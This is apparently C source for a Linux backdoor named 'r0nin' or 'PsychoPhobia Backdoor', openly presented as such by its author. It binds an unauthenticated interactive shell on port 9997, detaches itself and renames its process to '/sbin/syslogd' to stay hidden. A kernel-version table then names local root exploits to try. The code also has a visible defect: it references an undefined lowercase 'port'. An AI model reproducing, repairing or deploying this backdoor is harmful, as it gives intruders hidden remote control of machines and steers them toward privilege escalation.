/* r0nin v3.0 by m0rtix */      
                                
//////////////////////////////////////////////////////////////////
// Bind port, "ps aux" masked, Tell u if rootab or no etc...    //
//                                                              //
// m0rtix (c) 2006                                              //
// irc.epiknet.org #hakin9                                      //
//                            //
// Une petite pensée pour Sympt0me....                          //
//reloaded_matrix_revolutions@hotmail.com                       //
//////////////////////////////////////////////////////////////////

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <pwd.h>
#include <string.h>
#include <fcntl.h>
#include <signal.h>

#include <sys/resource.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/utsname.h>
#include <sys/wait.h>



#define MASK "/sbin/syslogd"
#define HOME "/"
#define	TIOCSCTTY	0x540E
#define TIOCGWINSZ      0x5413
#define TIOCSWINSZ      0x5414
#define ECHAR	0x1d
#define	BUF	32768
#define	PORT 9997

int leserver(void);
int rootab(void);
int noroot(void);
int kwst(void);
int oslinux(void);
int bsdbsd(void);



int main(int argc, char *argv[]) {



//have the current user in bash !!!
    
int uid = getuid();
struct passwd *pwd_str;
pwd_str = getpwuid(uid);
char *login;
login = malloc(strlen(pwd_str->pw_name));
strncpy(login, pwd_str->pw_name, strlen(pwd_str->pw_name));

//have the current kernel version !!!!

struct utsname *bof = (struct utsname*) malloc(sizeof(struct utsname));
int test;
if(test = uname(bof)) {
printf("Error %i\n", test);
exit(1); }

//to be hidden for "PS" command:
strcpy(argv[0], MASK);

fprintf(stdout, "\n\t     ,--.     |    o      ");
fprintf(stdout, "\n\t,-.-.|  |,---.|--- ..  ,  ");
fprintf(stdout, "\n\t| | ||  ||    |    | ><   ");
fprintf(stdout, "\n\t` ' '`--'`    `---'`'  `  \n");

fprintf(stdout, "\nPsychoPhobia Backdoor v3 by m0rtix is starting...OK, pid = %ld\n", (long)getpid());

fprintf(stdout, "Shell on: 9997      User: %s        UID: %ld\n", login, (long)getuid());
fprintf(stdout, "Name: %s  (Masked in PS! )  v: = %s %s %s\n\n", argv[0], bof->sysname, bof->nodename, bof->release);

kwst();
leserver();



return 0;
}

//////////////////////////////


//LESERVER - listen on 9997 port and give U a shell...

struct winsize {
	unsigned short ws_row;
	unsigned short ws_col;
	unsigned short ws_xpixel;
	unsigned short ws_ypixel;
};

/////////////////////////////////////////////////:
                                                  
void	get_tty(int num, char *base, char *buf)
{
	char	series[] = "pqrstuvwxyzabcde";
	char	subs[] = "0123456789abcdef";
	int	pos = strlen(base);
	strcpy(buf, base);
	buf[pos] = series[(num >> 4) & 0xF];
	buf[pos+1] = subs[num & 0xF];
	buf[pos+2] = 0;
}


/////////////////////////////////////////////

int	open_tty(int *tty, int *pty)
{
	char	buf[512];
	int	i, fd;
	
	fd = open("/dev/ptmx", O_RDWR);
	close(fd);
	
	for (i=0; i < 256; i++) {
		get_tty(i, "/dev/pty", buf);
		*pty = open(buf, O_RDWR);
		if (*pty < 0) continue;
		get_tty(i, "/dev/tty", buf);
		*tty = open(buf, O_RDWR);
		if (*tty < 0) {
			close(*pty);
			continue;
		}
		return 1;
	}
	return 0;
}

///////////////////////////////////////////////////

void	sig_child(int i)
{
	signal(SIGCHLD, sig_child);
	waitpid(-1, NULL, WNOHANG);
}

//////////////////////////////////////////////////:
                                                   
void	hangout(int i)
{
	kill(0, SIGHUP);
	kill(0, SIGTERM);
}

/////////////////////////////////////////////////////

int leserver(void) {
    	int	pid;
	struct	sockaddr_in	serv;
	struct	sockaddr_in	cli;
	int	sock;
	
	sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	if (sock < 0) {
		perror("socket");
		return 1;
	}

	bzero((char *) &serv, sizeof(serv));
	serv.sin_family = AF_INET;
	serv.sin_addr.s_addr = htonl(INADDR_ANY);
	serv.sin_port = htons(port);
	if (bind(sock, (struct sockaddr *) &serv, sizeof(serv)) < 0) {
		perror("bind");
		return 1;
	}
	if (listen(sock, 5) < 0) {
		perror("listen");
		return 1;
	}
	
	fflush(stdout);

	/* daemonize */
	setsid();
	chdir("/");
	pid = open("/dev/null", O_RDWR);
	dup2(pid, 0);
	dup2(pid, 1);
	dup2(pid, 2);
	close(pid);
	signal(SIGHUP, SIG_IGN);
	signal(SIGCHLD, sig_child);
	while (1) {
		int	scli;
		int	slen;
		slen = sizeof(cli);
		scli = accept(sock, (struct sockaddr *) &cli, &slen);
		if (scli < 0) continue;
		pid = fork();
		if (pid == 0) {
			int	subshell;
			int	tty;
			int	pty;
			fd_set	fds;
			char	buf[BUF];
			char	*argv[] = {"sh", "-i", NULL};
			#define MAXENV	256
			#define	ENVLEN	256
			char	*envp[MAXENV];
			char	envbuf[(MAXENV+2) * ENVLEN];
			int	j, i;
			char	home[256];

			/* setup enviroment */
			envp[0] = home;
			sprintf(home, "HOME=%s", HOME);
			j = 0;
			do {
				i = read(scli, &envbuf[j * ENVLEN], ENVLEN);
				envp[j+1] = &envbuf[j * ENVLEN];
				j++;
				if ((j >= MAXENV) || (i < ENVLEN)) break;
			} while (envbuf[(j-1) * ENVLEN] != '\n');
			envp[j+1] = NULL;

			/* create new group */
			setpgid(0, 0);

			/* open slave & master side of tty */
			if (!open_tty(&tty, &pty)) {
				char	msg[] = "Can't fork pty, bye!\n";
				write(scli, msg, strlen(msg));
				close(scli);
				exit(0);
			}
			/* fork child */
			subshell = fork();
			if (subshell == 0) {
				/* close master */
				close(pty);
				/* attach tty */
				setsid();
				ioctl(tty, TIOCSCTTY);
				/* close local part of connection */
				close(scli);
				close(sock);
				signal(SIGHUP, SIG_DFL);
				signal(SIGCHLD, SIG_DFL);
				dup2(tty, 0);
				dup2(tty, 1);
				dup2(tty, 2);
				close(tty);
				execve("/bin/sh", argv, envp);
			}
			/* close slave */
			close(tty);

			signal(SIGHUP, hangout);
			signal(SIGTERM, hangout);

			while (1) {
				/* watch tty and client side */
				FD_ZERO(&fds);
				FD_SET(pty, &fds);
				FD_SET(scli, &fds);
				if (select((pty > scli) ? (pty+1) : (scli+1),
				    &fds, NULL, NULL, NULL) < 0)
				    {
				    	break;
				}
				if (FD_ISSET(pty, &fds)) {
					int	count;
					count = read(pty, buf, BUF);
					if (count <= 0) break;
					if (write(scli, buf, count) <= 0) break;
				}
				if (FD_ISSET(scli, &fds)) {
					int	count;
					unsigned	char *p, *d;
					d = buf;
					count = read(scli, buf, BUF);			
					if (count <= 0) break;
					
					/* setup win size */
					p = memchr(buf, ECHAR, count);
					if (p) {
						unsigned char	wb[5];
						int	rlen = count - ((ulong) p - (ulong) buf);
						struct	winsize ws;

						/* wait for rest */
						if (rlen > 5) rlen = 5;
						memcpy(wb, p, rlen);
						if (rlen < 5) {
							read(scli, &wb[rlen], 5 - rlen);
						}

						/* setup window */
						ws.ws_xpixel = ws.ws_ypixel = 0;
						ws.ws_col = (wb[1] << 8) + wb[2];
						ws.ws_row = (wb[3] << 8) + wb[4];
						ioctl(pty, TIOCSWINSZ, &ws);
						kill(0, SIGWINCH);

						/* write the rest */
						write(pty, buf, (ulong) p - (ulong) buf);
						rlen = ((ulong) buf + count) - ((ulong)p+5);
						if (rlen > 0) write(pty, p+5, rlen);
					} else
						if (write(pty, d, count) <= 0) break;
				}
			}
			close(scli);
			close(sock);
			close(pty);

			waitpid(subshell, NULL, 0);
			vhangup();
			exit(0);
		}
		close(scli);
	}
}

////////////////////////////////////////////////////////////////////////



//END LESERVER


/////////////////////////////////////

//KWST - rootab ??????????
int kwst(void) {
    
struct utsname *bof = (struct utsname*) malloc(sizeof(struct utsname));
int test;
if(test = uname(bof)) {
printf("Error %i\n", test);
exit(1); }

char *osdev = bof->sysname;

if (strcmp(osdev, "Linux") == 0)  
oslinux(); else { if(strcmp(osdev, "FreeBSD") == 0) {
bsdbsd(); }}

return 0; }
//END KWST

//////////////////////////////////////

//OSLINUX - if is Linux:

int oslinux(void) {
    
///////////////// THanks to Anissina_Keiko ///////////////////////////////


struct utsname *bof = (struct utsname*) malloc(sizeof(struct utsname));
int test;
if(test = uname(bof)) {
printf("Error %i\n", test);
exit(1); }

char *kernelver = bof->release;

//////////////////////////////////////////// KERNEL 2.2.* //////////////////

if (strncmp(kernelver, "2.2.", 4) == 0)  
{
	printf("\nRootab !! use: ptrace!"); 
}
//////////////////////////////////////////// KERNEL 2.4.*  //////////////////
else if(strncmp(kernelver, "2.4.17", 6) == 0) 
{
	printf("\nRootab !! use: Kmod, newlocal !"); 
} else if (strncmp(kernelver, "2.4.18", 6) == 0) 
{
	printf("\nRootab !! use: Brk, newlocal, Kmod or Kmod2 !"); 
} else if (strncmp(kernelver, "2.4.19", 6) == 0) 
{
	printf("\nRootab !! use: Brk, newlocal, Kmod or Kmod2 !"); 
} else if (strncmp(kernelver, "2.4.20", 6) == 0) 
{
	printf("\nRootab !! use: elflbl, Ptrace, Brk2, w00t(if 2003), Kmod or Kmod2 !"); 
} else if (strncmp(kernelver, "2.4.21", 6) == 0) 
{
	printf("\nRootab !! use: Brk2, Ptrace, w00t(if 2003), Krad3(if elSMP), Kmod2 !"); 
} else if (strncmp(kernelver, "2.4.22", 6) == 0) 
{
	printf("\nRootab !! use: Brk2, Ptrace, w00t(if 2003), Kmod2 !"); 
} else if (strncmp(kernelver, "2.4.23", 6) == 0) 
{
	printf("\nRootab !! use: mremap_pte!"); 
} else if (strncmp(kernelver, "2.4.24", 6) == 0) 
{
	printf("\nRootab !! use: mremap_pte!"); 
} else if (strncmp(kernelver, "2.4.25", 6) == 0) 
{
	printf("\nRootab !! use: mremap_pte, Uselib24!"); 
} else if (strncmp(kernelver, "2.4.26", 6) == 0) 
{
	printf("\nRootab !! use: mremap_pte, Uselib24!"); 
} else if (strncmp(kernelver, "2.4.27", 6) == 0) 
{
	printf("Rootab !! use: don't know lol!\n"); 
}
//////////////////////////////////////////////////// KERNEL 2.6.* ///////////////////
else if (strncmp(kernelver, "2.6.2", 5) == 0) 
{
	printf("\nRootab !! use: expand_stack, mremap_pte!"); 
} else if (strncmp(kernelver, "2.6.3", 5) == 0) 
{ 
	printf("\nRootab !! use: expand_stack, Krad(if 2004) !"); 
} else if (strncmp(kernelver, "2.6.4", 5) == 0) 
{
	printf("\nRootab !! use: expand_stack, Krad(if 2004) !"); 
} else if (strncmp(kernelver, "2.6.5", 5) == 0) 
{ 
	printf("\nRootab !! use: expand_stack, Krad(if 2004) !"); 
} else if (strncmp(kernelver, "2.6.6", 5) == 0) 
{ 
	printf("\nRootab !! use: expand_stack, Krad(if 2004) !"); 
} else if (strncmp(kernelver, "2.6.7", 5) == 0) 
{ 
	printf("\nRootab !! use: expand_stack, Krad(if 2004) !"); 
} else if (strncmp(kernelver, "2.6.8", 5) == 0) 
{ 
	printf("\nRootab !! use: expand_stack, Krad(if 2004) !"); 
} else if (strncmp(kernelver, "2.6.9", 5) == 0) 
{
	printf("\nRootab !! use: expand_stack, Krad(if 2004), Krad2(if 2004), Krad3 !"); 
} else if (strncmp(kernelver, "2.6.10", 5) == 0) 
{
	printf("\nRootab !! use: expand_stack, Krad(if 2004), Krad2(if 2004), Krad3 !"); 
} else if (strncmp(kernelver, "2.6.11", 5) == 0) 
{
	printf("\nRootab !! use: expand_stack, Krad2(if 2004), Krad3 !"); 
} else if (strncmp(kernelver, "2.6.12", 5) == 0) 
{ 
	printf("\nRootab !! use: expand_stack, Krad2(if 2004) !"); 
} else if (strncmp(kernelver, "2.6.13", 5) == 0) 
{
	printf("\nRootab !! use: expand_stack !"); 
} else if (strncmp(kernelver, "2.6.14", 5) == 0) 
{
	printf("\nRootab !! use: expand_stack !"); 
} else if (strncmp(kernelver, "2.6.15", 5) == 0) 
{
	printf("\nRootab !! use: expand_stack !");
} else 
{
	printf("\nDon't know for ths version:   %s\n", kernelver);
}

return 0;
}

//END OS

/////////////////////////////////////////

//BSDBSD If FreeBSD:
      
int bsdbsd(void) {
fprintf(stdout, "\n\t Oh NOoo !!! it's a FreeBSD system, i can't say you if this sheat is rootab !!\n\n"); 
return 0; 
}

//BSDBSD END

////////////////////////////////////////////